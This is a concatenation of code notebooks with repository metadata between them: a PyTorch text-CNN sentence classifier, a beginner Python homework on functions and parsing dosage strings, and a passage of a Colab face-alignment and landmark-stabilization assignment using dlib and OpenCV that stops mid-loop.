        x = x.transpose(1, 2)
        x = self.emb(x)
        x = x.transpose(1, 2)
        x1 = self.pool(F.relu(self.conv1(x)))
        x2 = self.pool(F.relu(self.conv2(x)))
        x3 = self.pool(F.relu(self.conv3(x)))
        # squeeze(-1), not squeeze(): a bare squeeze() also dropped the batch
        # dimension when the batch had a single example.
        x = torch.cat((x1, x2, x3), dim=1).squeeze(-1)
        x = self.dropout(x)
        x = self.fc1(x)
        return x
net_2 = Net_dynamic().to(device)
# +
class Net_dual(nn.Module):
    """Dual-channel text CNN: concatenates the original word vectors with a
    learnable linear re-embedding, feeding 100 input channels to each
    convolutional branch. Returns (batch, 16) logits.
    """

    def __init__(self):
        super(Net_dual, self).__init__()
        self.emb = nn.Linear(50, 50)  # learnable second channel
        self.conv1 = nn.Conv1d(100, 100, 3)
        self.conv2 = nn.Conv1d(100, 100, 4)
        self.conv3 = nn.Conv1d(100, 100, 5)
        self.pool = nn.MaxPool1d(60)
        self.dropout = nn.Dropout(p=0.5)
        self.fc1 = nn.Linear(300, 16)

    def forward(self, x):
        # Second channel: linearly re-embedded copy of the input, stacked on
        # the channel axis.
        x_emb = self.emb(x.transpose(1, 2)).transpose(1, 2)
        x = torch.cat((x, x_emb), dim=1)
        x1 = self.pool(F.relu(self.conv1(x)))
        x2 = self.pool(F.relu(self.conv2(x)))
        x3 = self.pool(F.relu(self.conv3(x)))
        # squeeze(-1), not squeeze(): a bare squeeze() also dropped the batch
        # dimension when the batch had a single example.
        x = torch.cat((x1, x2, x3), dim=1).squeeze(-1)
        x = self.dropout(x)
        x = self.fc1(x)
        return x
net_3 = Net_dual().to(device)
# +
# Build the label-text <-> class-index mappings from the unique training labels.
label_train = list(set(list(np.load('D:/Courses/11747/label_train.npy'))))
label_dict = dict()
for idx, key in enumerate(label_train):
    label_dict[key] = idx
# add hard coding for mislabel
# NOTE(review): 'Media and darama' is a typo present in the raw label data;
# it is deliberately mapped onto the correct class index.
label_dict['Media and darama'] = label_dict['Media and drama']
print (label_dict)
# Position i holds the label text for class index i (relies on Python 3.7+
# insertion-ordered dicts); used to turn predicted indices back into strings.
label_list = list(label_dict.keys())
print (label_list)
# +
# From PyTorch dataloader offical tutorial
class Sentence():
    """Sentence classification dataset.

    Loads pre-embedded sentences from *dataset_dir* as a (N, channel, length)
    float tensor on `device`, and maps label strings from *label_dir* to class
    indices via the module-level `label_dict`. Items are dicts with keys
    'data' and 'label'.
    """

    def __init__(self, dataset_dir, label_dir):
        # reshaping data from (N, length, channel) to (N, channel, length)
        self.data = torch.from_numpy(np.load(dataset_dir)).transpose(1, 2).float().to(device)
        # reading raw label data, transform to integer value using dict
        label_list = np.load(label_dir)
        self.labels = torch.zeros(self.data.shape[0]).to(device)
        for i in range(len(self.labels)):
            try:
                self.labels[i] = label_dict[label_list[i]]
            except KeyError:
                # Unknown label text keeps the default class 0. Narrowed from a
                # bare `except:` so only missing-dictionary-key cases are
                # tolerated, not arbitrary errors.
                pass
        print (self.data.shape, self.labels.shape)

    def __len__(self):
        return len(self.labels)

    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        data = self.data[idx]
        label = self.labels[idx]
        sample = {'data': data, 'label': label}
        return sample
# -
# Materialise the train / val / test datasets (tensors live on `device`).
dataset_train = Sentence('D:/Courses/11747/data_train.npy', 'D:/Courses/11747/label_train.npy')
dataset_val = Sentence('D:/Courses/11747/data_val.npy', 'D:/Courses/11747/label_val.npy')
dataset_test = Sentence('D:/Courses/11747/data_test.npy', 'D:/Courses/11747/label_test.npy')
# shuffle=False keeps prediction CSV rows aligned with the on-disk example order.
train_loader = torch.utils.data.DataLoader(dataset_train, batch_size=32,
                                           shuffle=False, num_workers=0)
val_loader = torch.utils.data.DataLoader(dataset_val, batch_size=32,
                                         shuffle=False, num_workers=0)
test_loader = torch.utils.data.DataLoader(dataset_test, batch_size=32,
                                          shuffle=False, num_workers=0)
def eval(model, model_name):
    """Evaluate *model* on the validation set.

    Writes the predicted label strings to '<model_name>_pred.csv' (one per
    row, in loader order) and returns the validation accuracy as a float.
    Note: shadows the builtin `eval`; kept for compatibility with callers.
    """
    model.eval()
    # Fixed: `criterion` was an undefined global (it only existed as a local
    # inside train()); build it here instead.
    criterion = nn.CrossEntropyLoss()
    err = 0
    running_loss = 0.0
    all_pred = []
    with torch.no_grad():  # no gradients needed during evaluation
        for i, data in enumerate(val_loader):
            # get the inputs; data is a list of [inputs, labels]
            inputs = data['data']
            labels = data['label'].long()
            outputs = model(inputs)
            pred = torch.argmax(outputs, dim=1)
            all_pred += pred.tolist()
            # Non-zero entries of (labels - pred) are misclassified examples.
            err += torch.nonzero(labels - pred).size(0)
            loss = criterion(outputs, labels)
            running_loss += loss.item()
    # (The old periodic progress print here referenced undefined names
    # `epoch`/`trainloader` and would have raised NameError; removed.)
    # calculating accuracy
    accu = 1 - err / dataset_val.__len__()
    print (len(all_pred))
    print ('Accuracy: ', accu)
    # print output label txt file
    output_label = [label_list[pred_i] for pred_i in all_pred]
    df = pd.DataFrame(output_label)
    df.to_csv(model_name + "_pred.csv", sep=',', index=False, header=False)
    return accu
def test(model, model_name):
    """Run *model* over the test loader and write predicted label strings
    to '<model_name>_pred_test.csv', one per row in loader order.
    """
    model.eval()
    all_pred = []
    with torch.no_grad():  # inference only; avoids building the autograd graph
        for i, data in enumerate(test_loader):
            inputs = data['data']
            outputs = model(inputs)
            pred = torch.argmax(outputs, dim=1)
            all_pred += pred.tolist()
    # print output label txt file
    output_label = [label_list[pred_i] for pred_i in all_pred]
    df = pd.DataFrame(output_label)
    df.to_csv(model_name + "_pred_test.csv", sep=',', index=False, header=False)
# +
import torch.optim as optim
def train(net, model_name, epochs = 10):
    """Train *net* for *epochs* epochs with SGD, evaluating on the validation
    set after every epoch.

    Saves the best checkpoint (by validation accuracy) to '<model_name>.best'
    and dumps accuracy / loss histories to CSV.
    """
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)
    eval_accu = []
    train_loss = []
    eval(net, model_name)  # baseline accuracy before any training
    for epoch in range(epochs):  # loop over the dataset multiple times
        # Fixed: eval() leaves the model in eval mode, which disabled dropout
        # for the whole of training; switch back explicitly.
        net.train()
        running_loss = 0.0
        # Fixed: the loop iterated an undefined name `trainloader`; the
        # DataLoader defined above is `train_loader`.
        for i, data in enumerate(train_loader):
            # get the inputs; data is a list of [inputs, labels]
            inputs = data['data']
            labels = data['label'].long()
            # zero the parameter gradients
            optimizer.zero_grad()
            # forward + backward + optimize
            outputs = net(inputs)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            # print statistics
            running_loss += loss.item()
            if i % 2000 == 1999:  # print every 2000 mini-batches
                train_loss.append(running_loss / 2000)
                print('[%d, %5d / %d] loss: %.3f' %
                      (epoch + 1, i + 1, len(train_loader), running_loss / 2000))
                running_loss = 0.0
        eval_accu.append(eval(net, model_name))
        if eval_accu[-1] == max(eval_accu):
            torch.save(net.state_dict(), model_name + '.best')
    df = pd.DataFrame(eval_accu)
    df.to_csv(model_name + '_' + str(epochs) + "_accu.csv", sep=',', index=False, header=False)
    df = pd.DataFrame(train_loss)
    df.to_csv(model_name + '_' + str(epochs) + "_train_loss.csv", sep=',', index=False, header=False)
    print('Finished Training')
    print('Accuracy: ', eval_accu)
# +
# static training: 0.7542768273716952, 0.7822706065318819, 0.8087091757387247, 0.8087091757387247, 0.8009331259720063, 0.8040435458786936, 0.807153965785381, 0.7993779160186625, 0.80248833592535, 0.8040435458786936
#
train(net, 'static', 50)  # static-embedding baseline
# -
train(net_2, 'dynamic', 50)  # learnable re-embedding variant
train(net_3, 'dual', 50)  # dual-channel variant
test(net_3, 'dual')
# Reload the best (highest validation accuracy) dual-channel checkpoint and
# produce final validation + test predictions with it.
net_best = Net_dual().to(device)
net_best.load_state_dict(torch.load('dual.best'))
eval(net_best, 'model_best')
test(net_best, 'model_best')
| 8,858 |
/week13/week03-paulboal.ipynb
|
c7e5ac63f592fa2b62c3960fac0f9a4e055fa0f1
|
[
"MIT"
] |
permissive
|
aihill/slucor-hds5210-2018-1
|
https://github.com/aihill/slucor-hds5210-2018-1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,857 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# _SLUCOR HDS5210 - Programming for Health Data Science - 2016 Fall_
#
# Week 3 (Sep 7) Exercises
# ===
#
# Before starting, be sure that you have completed the GitHub setup from week 2 and have your hds5210-week02 repository setup from the homework last assignments. You'll continue to use the same Git project / repository to submit your assignments.
# #1 - Creating Functions
# ---
#
# Write a function that will compute the sum of three numbers. Then use that function to calculate the sum of the eight numbers below:
#
# ```
# 4, 9, 12, 8, 16, 19, 11, 10
# ```
def sum3(a, b, c):
    """ (float,float,float) -> float
    Return the sum of exactly three numbers.
    >>> sum3(1,2,3)
    6
    """
    # Delegate to the built-in sum over a fixed 3-tuple.
    return sum((a, b, c))
sum3( sum3(4,9,12), sum3(8,16,19), sum3(11,10,0) )
# The purpose here was to demonstrate how you could reuse your own function while you're calling your own function.
#
# ---
#
# ---
#
# #2 - Understanding Functions
# ---
#
# Try to reason through this set of instruction and determine what the output will be. Check your understanding by running the code in Jupyter. Then explain why the output is what it is.
#
# ```
# temp = 103
#
# def calculate_target (temp):
# temp -= 4
# return temp
#
# calculate_target (temp)
#
# print("The current value of temp is " + str(temp))
# ```
#
# When we define `temp = 103` we create a variable named `temp`. That `temp` and the `temp` variable that is used as the variable name for the parameter of our function `calculate_target` are not the same. The `temp` inside the function definition is called a "local variable" and it is different than the first `temp` we created. It hides the original `temp`. Our function takes whatever value it is given and subtracts 4 and then returns that value, however, we never do anything with the output from `calculate_target (temp)`. You can tell that because there's no variable to the left of the function call.
#
# If we had wanted to actually change our original variable `temp`, we could have said: `temp = calculate_target (temp)`.
#
# In that case, it would have executed this way:
# * `temp = 103`
# * `temp = calculate_target(temp)`
# * `temp = calculate_target(103)`
# * `temp = 94`
#
# ---
#
# ---
# #3 - Parsing Dosage Amounts and Units
# ---
#
# Create a function that will take as input an infusion dosage value and unit in the format `# volume/time` such as `45 mg/hr` or `0.2 L/hr`, and return just the numeric part of the dosage. It should return the numeric part as a floating point decimal number so that calculations can easily be done with the number.
#
# Demonstrate that your function works correctly using each of these tests:
# ```
# 1.0 L/hr
# 10 mg/hr
# 0.75 g/day
# ```
def get_amount(var):
    """ (str) -> float
    Extract the leading numeric dosage from a string of the form
    '<amount> <unit>/<time>', e.g. '45 mg/hr' -> 45.0.

    Raises ValueError if the leading token is not a number, and
    IndexError if the string is empty/whitespace-only.
    """
    # split() tolerates leading/repeated whitespace; the old
    # `var.find(" ")` approach mis-sliced when the input had a leading
    # space (find -> 0, slice -> '') or no space at all (find -> -1).
    return float(var.split()[0])
get_amount('1.0 L/hr')
get_amount('10 mg/hr')
get_amount('0.75 g/day')
# ---
#
# ---
# #4 - Parsing and Rewriting a String
# ---
#
# Create another function or collection of functions that will take a string in the format `drug # volume/time` such as `Aspirin 20 mg/hr`, and return a string in the format `In one hr, the patient will have received 20 mg of Aspirin. Doubling the dosage to 40 mg would be dangerous!`. Be sure that you reuse the other functions you've created in this assignment if possible.
#
# Demonstrate that your function works correctly using these tests:
#
# ```
# Aspirin 20 mg/hr
# Amoxicillin 300 mg/day
# ```
def warning(var):
    """ (str) -> str
    Parse a dosage string of the form '<drug> <amount> <mass_unit>/<time_unit>'
    (e.g. 'Aspirin 20 mg/hr') and return a sentence describing the received
    dose plus a warning about doubling it.

    Raises ValueError if the amount token is not numeric.
    """
    # str.partition splits on the first occurrence and is clearer (and
    # safer) than the original hand-rolled find()/slice index arithmetic.
    drug, _, rest = var.partition(" ")
    amount_str, _, dose_unit = rest.partition(" ")
    mass_unit, _, time_unit = dose_unit.partition("/")
    amount = float(amount_str)
    a = "In one {:s}, the patient will have received {:.2f} {:s} of {:s}.".format(time_unit, amount, mass_unit, drug)
    b = "Doubling the dosage to {:.2f} {:s} would be dangerous!".format(amount * 2, mass_unit)
    return a + " " + b
warning('Aspirin 20 mg/hr')
warning('Amoxicillin 300 mg/day')
# ---
#
# ---
#
# ## If you need any help remembing how to commit your work, look here:
#
# ```
# # %%bash
# # cd ~/notebooks/hds5210-week02/
# git add week03-paulboal.ipynb
# git commit -a -m "Adding homework for week 3"
# git push
# ```
| 4,550 |
/ProcessEncodeFiles.ipynb
|
83dbd9154bc100fdbf92d91818ae6f96cec613aa
|
[] |
no_license
|
vanya-antonov/lab_scripts
|
https://github.com/vanya-antonov/lab_scripts
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 86,072 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/sudhakarmlal/EVA/blob/master/Assignment23/Assignment23.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="VOUWYfilVIGn" colab_type="text"
# Assignment - 23
# --------------------
# Name : K Sudhakar Reddy
#
# Background :
# The Purpose of this assignment is to perform image stabilization and alignment. This task is very much required for performing a facial recognition task. The modern networks are very good at recognizing faces, however the accuracy improves when the face is given in the image is stabilized and aligned properly. So for any face recognition task one of the important pre processing is Face alignment and stabilization .
#
#
# Requirements
# -------------
# Implement the following:
# This Assignment requires us to take a video of 5 seconds as the ground truth with a minimal translation/variance and outputs(take a 5 second video of your face with some translation and rotation (not extreme) a video with 3 different output which includes
# 1. Original frame
# 2. Aligned Frame with unstabilized points
# 3. Aligned Frame with stabilzed points
#
# That means If the original video was 400x400 resolution, final video is 1200x400. Final video is 5 seconds and we need to see all 3 videos side by side for comparison. Upload to youtube, and embed the video in your readme file.
#
# We will use the following method to achieve this
# 1. Use dlib Face Detector
# 2. Align the face using 5-pt detector and align
# 3. Calculate 68-pt landmark on the aligned faces
# 4. Calculate the optical flow for these 68-pts every frame
# 5. Stabilize the optical flow using LK method as we discussed.
#
# Environment
# ------------------
# Development - Colab GPU , Jupyter Notebook Repository : Github
#
# Models :
# 1. 5 Point Landmark model
# 2. 68 Point landmark model
#
# + [markdown] id="uh6AldltZGs5" colab_type="text"
# # Link Google Drive to Colab Notebook
# + id="3voQkDsMVItH" colab_type="code" outputId="f1204597-ca7b-4f6a-9b19-6b5fd0e5e75d" colab={"base_uri": "https://localhost:8080/", "height": 124}
from google.colab import drive
drive.mount('/content/drive')
# + [markdown] id="Q5AbYBOIZS5D" colab_type="text"
# # import all the libraries to notebook
# + id="1rYSUnCWct98" colab_type="code" colab={}
import cv2, dlib
import numpy as np
import math, sys
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] id="NSZkoQT8ZYbw" colab_type="text"
# #Copy Contents to Current Working Directory
# + id="UJ0AgTQQ_lfZ" colab_type="code" colab={}
# !cp -r '/content/drive/My Drive/EVA-18/models' /content
# !cp -r '/content/drive/My Drive/EVA-18/videos' /content
# !cp '/content/drive/My Drive/EVA-18/faceBlendCommon.py' /content
# + [markdown] id="d5YqKwIAZaLy" colab_type="text"
# # Matplotlib Operations to resize image and change the scale
# + id="yLM2RPk4cysY" colab_type="code" colab={}
import matplotlib
matplotlib.rcParams['figure.figsize'] = (6.0,6.0)
matplotlib.rcParams['image.cmap'] = 'gray'
# + [markdown] id="CPhSPxGdZgCb" colab_type="text"
# # import os
# + id="RBL6OkRd_3W8" colab_type="code" colab={}
import os
# + [markdown] id="8PSb8Q4iZim0" colab_type="text"
# # Function to save images to the specified directory in Google Drive
# + id="36vhNxjfc8ek" colab_type="code" colab={}
def save_all_images(path, filename, imageList):
    """Write every image in *imageList* to directory *path* as PNG files.

    Files are named '<filename>_<index>.png', the same scheme that
    read_all_images() uses when loading them back.

    path      -- destination directory
    filename  -- filename prefix (no extension)
    imageList -- sequence of images accepted by cv2.imwrite
    """
    for cnt, image in enumerate(imageList):
        # os.path.join inserts the separator when *path* lacks a trailing
        # slash; the original `os.path.join(path) + temp_fn` concatenation
        # silently produced a wrong path in that case.
        fn = os.path.join(path, filename + '_' + str(cnt) + '.png')
        cv2.imwrite(fn, image)
# + [markdown] id="Jvfx_jYLZluE" colab_type="text"
# # Read the Video file from Google Drive and convert that into images
# + id="0h1W8Mggc3rV" colab_type="code" colab={}
cap = cv2.VideoCapture('/content/videos/video_eva18.mp4')
all_frames = []
while(cap.isOpened()):
ret, frame = cap.read()
if frame is None:
break
all_frames.append(frame)
#plt.imshow(frame)
cap.release()
# + [markdown] id="CW730WsWZqz3" colab_type="text"
# # Display an image for testing
# + id="3v2QXDscAV45" colab_type="code" outputId="420c5885-a2aa-4c31-cceb-222baf5374e7" colab={"base_uri": "https://localhost:8080/", "height": 332}
plt.imshow(all_frames[0][:,:,::-1])
# + [markdown] id="6xXC_zaKZsth" colab_type="text"
# # Create a directory names test inside the parent directory
# + id="tumjb_cEAY9O" colab_type="code" colab={}
directory = "test"
# Parent Directory path
parent_dir = "/content/drive/My Drive/EVA-18/"
# Path
path = os.path.join(parent_dir, directory)
os.mkdir(path)
# + [markdown] id="9ZPahyL2ZvzE" colab_type="text"
# # Make another diretcory for keeping the original images
# + id="E0qbDu9yAqFW" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/original')
# + [markdown] id="7Xc2s_DZZ74M" colab_type="text"
# Save all images to the folder
# + id="Ftid6Fu8A--Q" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/original/', 'frame', all_frames)
# + [markdown] id="L23rKOK6Z9pn" colab_type="text"
# # Define path for the 5 point landmark model
# + id="D7CGOVWjBIKH" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH = MODEL_PATH + "shape_predictor_5_face_landmarks.dat"
# + [markdown] id="Uz4HD2P0Z_ep" colab_type="text"
# #define the object to detect front faces
# + id="YIjT8Dp0BYK3" colab_type="code" colab={}
faceDetector = dlib.get_frontal_face_detector()
# The landmark detector is implemented in the shape_predictor class
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH)
# + [markdown] id="IttQK0L4aCZB" colab_type="text"
# # Import user defined helper functions
# + id="hc33a8RcBiM1" colab_type="code" colab={}
import faceBlendCommon as fbc
# + [markdown] id="QVnewIBEaGLO" colab_type="text"
# # The following function takes an image and aligns it using the 5-point landmark model
# + id="6wxg4I_TBbQP" colab_type="code" colab={}
# get the aligned face
def get_aligned_face(im):
    """Detect the face in *im*, locate its landmarks via fbc.getLandmarks,
    and return a 600x600 face image normalized to canonical landmark
    positions.

    NOTE(review): the return type is inconsistent — on success a uint8
    image is returned, but when no landmarks are found the float32 image
    scaled to [0, 1] is returned instead; callers should verify which
    range/dtype they receive.
    """
    # Detect faces in the image
    #print('image tensor is',im)
    faceRects = faceDetector(im, 0)
    print("Number of faces detected: ",len(faceRects))
    # Detect landmarks (uses the module-level faceDetector/landmarkDetector).
    points = fbc.getLandmarks(faceDetector, landmarkDetector, im)
    print('length of points is', points)
    #len(points)
    points = np.array(points)
    print('after np array',len(points))
    # Convert image to floating point in the range 0 to 1
    im = np.float32(im)/255.0
    # Dimensions of output image
    h = 600
    w = 600
    # Normalize image to output coordinates.
    if len(points) > 0:
        imNorm, points = fbc.normalizeImagesAndLandmarks((h, w), im, points)
        # Back to uint8 pixel range for display/saving.
        imNorm = np.uint8(imNorm*255)
        return imNorm
    else:
        # No landmarks: fall back to the (float, [0,1]-scaled) input image.
        return im
# + [markdown] id="fqVTHg-haQsm" colab_type="text"
# # Calls the Alignment method to align each image
# + id="w1wnic5HBdvt" colab_type="code" outputId="e2eb9e21-cd8c-4813-95e8-c42977e8cf83" colab={"base_uri": "https://localhost:8080/", "height": 1000}
all_aligned_faces = []
print('Aligning all frames... ')
# process one frame at a time.
for cnt in range(0, len(all_frames)):
frame = all_frames[cnt]
aligned_face = get_aligned_face(frame)
all_aligned_faces.append(aligned_face)
print('Done!')
# + [markdown] id="-cAxqFY6aW5q" colab_type="text"
# # Let's display one original image for testing
# + id="8EgmV0SvPMQo" colab_type="code" outputId="a9191edc-19d8-4e61-b25c-510e4fc6a745" colab={"base_uri": "https://localhost:8080/", "height": 327}
plt.imshow(all_frames[50][:,:,::-1])
plt.title("Original Image")
plt.show()
# + [markdown] id="k_xNV8zbaaT1" colab_type="text"
# # Display the aligned image
# + id="Q_pPsn6tBgSu" colab_type="code" outputId="0b5c8163-7eb6-493d-f54a-459416268a60" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_aligned_faces[50][:,:,::-1])
plt.title("Aligned Image")
plt.show()
# + [markdown] id="5Zqa1gC-adSl" colab_type="text"
# # Make a directory for saving the aligned images
# + id="SWTOcMLrPGVp" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/aligned_face')
# + [markdown] id="1GYd-re1ahhC" colab_type="text"
# # Save all aligned images to folder in gdrive
# + id="w-_0fAz5QDm4" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/aligned_face/', 'align_face', all_aligned_faces)
# + [markdown] id="wKU7w0WtamG3" colab_type="text"
# # Load the 68 point landmark detector
# + id="P403O3oAOQVU" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH_2 = MODEL_PATH + "shape_predictor_68_face_landmarks.dat"
# + [markdown] id="g7HNYvShap9l" colab_type="text"
# # Create an object for the frontal face method /class
# + id="G8-8tBH2PvMo" colab_type="code" colab={}
faceDetector = dlib.get_frontal_face_detector()
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH_2)
# + [markdown] id="GsGPM_dFau1Q" colab_type="text"
# # Function to render the face
# + id="W81ZCoDcM5SU" colab_type="code" colab={}
def renderFace2(im, landmarks, color=(200, 0, 0), radius=3):
    """Draw each landmark point on *im* (in place) as a filled circle."""
    for point in landmarks.parts():
        center = (point.x, point.y)
        cv2.circle(im, center, radius, color, -1)
# + [markdown] id="UlgIJRF4ax2K" colab_type="text"
# # method to get landmark aligned face
# + id="s3i43SFxK15s" colab_type="code" colab={}
# get the aligned face
def get_landmarks_aligned_face(im):
    """Draw 68-point facial landmarks on *im* (in place) and return it.

    Detects each face in the image, runs the 68-point landmark detector on
    its bounding rectangle and renders the points as filled circles via
    renderFace2.

    Fix: the original had no return statement, so callers collecting its
    result stored None. Returning *im* (the same array, mutated in place)
    fixes that without affecting callers that relied on the side effect.
    """
    # Detect faces in the image
    faceRects = faceDetector(im, 0)
    for i in range(0, len(faceRects)):
        newRect = dlib.rectangle(int(faceRects[i].left()),
                                 int(faceRects[i].top()),
                                 int(faceRects[i].right()),
                                 int(faceRects[i].bottom()))
        # For every face rectangle, run landmarkDetector
        landmarks = landmarkDetector(im, newRect)
        # Report the landmark count once per image
        if i == 0:
            print("Number of landmarks", len(landmarks.parts()))
        renderFace2(im, landmarks, color=(200, 0, 0), radius=3)
    return im
# + [markdown] id="8fTWmBPXa6UY" colab_type="text"
# # calls the method which gives the 68 landmark points on the face
# + id="oXdLnpWfLvXC" colab_type="code" outputId="cc380411-bb3b-4cea-af7c-c8a1c2daf9b6" colab={"base_uri": "https://localhost:8080/", "height": 935}
all_landmark_faces = []
for cnt in range(0, len(all_aligned_faces)):
frame = all_aligned_faces[cnt]
landmark_face = get_landmarks_aligned_face(frame)
all_landmark_faces.append(landmark_face)
print('Done!')
# + [markdown] id="DVANIfCjbBY6" colab_type="text"
# # Let's display the landmarks on the unstabilized image
# + id="y4i7dGodMIlZ" colab_type="code" outputId="dde34d10-ea5b-4d34-c8c5-5d9074924208" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_landmark_faces[1][:,:,::-1])
plt.title("Landmark Image")
plt.show()
# + [markdown] id="zuoJtvDnbFG4" colab_type="text"
# # create a directory for storing these images
# + id="H8xbxtMJSkhv" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/landmark_faces')
# + [markdown] id="8iPK5hlWbIUp" colab_type="text"
# # save all images to the folder
# + id="mepqqR7FTKpu" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/landmark_faces/','landmarks',all_landmark_faces)
# + [markdown] id="LxYy24h0bLiw" colab_type="text"
# # This method converts frames to videos
# + id="MGBV1_ZKxjxF" colab_type="code" outputId="72ffb2c2-7de2-4c36-b8c8-aaec664c2125" colab={"base_uri": "https://localhost:8080/", "height": 1000}
from os.path import isfile, join
def convert_frames_to_video(pathIn, pathOut, fps):
    """Assemble every frame image found in *pathIn* into a DIVX video.

    pathIn  -- directory containing '<prefix>_<index>.png' frames
    pathOut -- output video file path
    fps     -- playback frame rate

    Fix: frames are now sorted by their numeric index. The bare
    os.listdir() ordering (the sort was commented out because its key was
    wrong for these filenames) interleaves e.g. frame_2 and frame_20 and
    scrambles the video.
    """
    files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
    # Sort on the integer between the last '_' and the extension.
    files.sort(key=lambda name: int(os.path.splitext(name)[0].rsplit('_', 1)[1]))
    frame_array = []
    size = None
    for name in files:
        filename = join(pathIn, name)
        # reading each file
        img = cv2.imread(filename)
        height, width, layers = img.shape
        size = (width, height)
        print(filename)
        # inserting the frames into an image array
        frame_array.append(img)
    out = cv2.VideoWriter(pathOut, cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
    for frame in frame_array:
        # writing to the video file
        out.write(frame)
    out.release()
pathIn= '/content/drive/My Drive/EVA-18/test/aligned_face/'
pathOut = '/content/drive/My Drive/EVA-18/videos/align.mp4'
fps = 10.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="XezekqovbTLX" colab_type="text"
# # resize the images which can be used to stabilize the faces later
# + id="CdFiGsIOQRmY" colab_type="code" colab={}
MODEL_PATH = '/content/drive/My Drive/EVA-18/models/'
PREDICTOR_PATH = MODEL_PATH + "shape_predictor_68_face_landmarks.dat"
RESIZE_HEIGHT = 480
NUM_FRAMES_FOR_FPS = 100
SKIP_FRAMES = 1
# + [markdown] id="yXIr_RdSbZBO" colab_type="text"
# # method to calculate and return the distnace between the eyes for stabilization
# + id="snN7aYsdQciZ" colab_type="code" colab={}
def interEyeDistance(predict):
    """Return the (truncated-int) pixel distance between the outer eye
    corners of a 68-point landmark set.

    predict -- indexable landmark collection; index 36 is the left eye's
    left corner and index 45 is the right eye's right corner.
    """
    left = predict[36]
    right = predict[45]
    dx = right.x - left.x
    dy = right.y - left.y
    # Euclidean distance, truncated to int (same as int(cv2.norm(...))).
    return int(math.hypot(dx, dy))
# + id="TFDejDtAQfHX" colab_type="code" colab={}
winName = "Stabilized facial landmark detector"
# + id="Xf3tZi2sQg7c" colab_type="code" colab={}
videoFileName = "/content/drive/My Drive/EVA-18/videos/align.mp4"
# Initializing video capture object.
cap = cv2.VideoCapture(videoFileName)
if(cap.isOpened()==False):
print("Unable to load video")
# + id="iybntwatQnWB" colab_type="code" colab={}
import math
from google.colab.patches import cv2_imshow
# + [markdown] id="QpjMQfLsbkzX" colab_type="text"
# # define parameters
# + id="nxpkBrYrQqBr" colab_type="code" colab={}
winSize = 101
maxLevel = 10
fps = 30.0
# Grab a frame
ret,imPrev = cap.read()
# + id="0vrEwHI6Qsw9" colab_type="code" colab={}
size = imPrev.shape[0:1]
# + id="E8-uQeAgQu-u" colab_type="code" outputId="2caa1ba9-6929-4d8b-d442-1498337cbb9d" colab={"base_uri": "https://localhost:8080/", "height": 54}
print(size)
print(imPrev.shape)
# + [markdown] id="MvLiyauybon5" colab_type="text"
# # create objects for landmark detector
# + id="QRyy4t5eQweY" colab_type="code" colab={}
detector = dlib.get_frontal_face_detector()
landmarkDetector = dlib.shape_predictor(PREDICTOR_PATH)
# + [markdown] id="hSBE9zaXbsGz" colab_type="text"
# # declare variables to capture stabilization points
# + id="BrlSSaRsQzJn" colab_type="code" colab={}
points=[]
pointsPrev=[]
pointsDetectedCur=[]
pointsDetectedPrev=[]
# + id="fK_WIf0lRGQe" colab_type="code" colab={}
eyeDistanceNotCalculated = True
eyeDistance = 0
isFirstFrame = True
# Initial value, actual value calculated after 100 frames
fps = 10
showStabilized = False
count =0
# + id="lS5aj4arRH1Z" colab_type="code" colab={}
all_stabilized_frames = []
# + [markdown] id="SK6tiPn7bzPN" colab_type="text"
# # The following lines of code calculates
# 1. converts BGR to RGB followed by gray scale
# 2. optical flow for each pixel in the image
# 3. Stabilize the optical flow using LK method
# 4. resize the image
# 5. Align the face using stabilized points
#
# + id="o6nR0zXJRKGY" colab_type="code" outputId="ce916bdf-5b77-4912-fa50-e4c900f96791" colab={"base_uri": "https://localhost:8080/", "height": 1000}
# Main stabilization loop: for each frame, detect the face, compute 68
# landmarks, track them with Lucas-Kanade optical flow, and blend detected
# vs. tracked positions with a distance-dependent weight (stabilization).
while(True):
    if (count==0):
        # Start timing a batch of NUM_FRAMES_FOR_FPS frames for the FPS readout.
        t = cv2.getTickCount()
    # Grab a frame
    ret,im = cap.read()
    if im is None:
        break
    imDlib = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
    # COnverting to grayscale
    imGray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
    # NOTE(review): this overwrites the previous frame's grayscale image
    # every iteration, so calcOpticalFlowPyrLK below compares the current
    # frame with itself — confirm whether this assignment was intended
    # (it is also re-done at the end of the loop).
    imGrayPrev = imGray
    height = im.shape[0]
    IMAGE_RESIZE = float(height)/RESIZE_HEIGHT
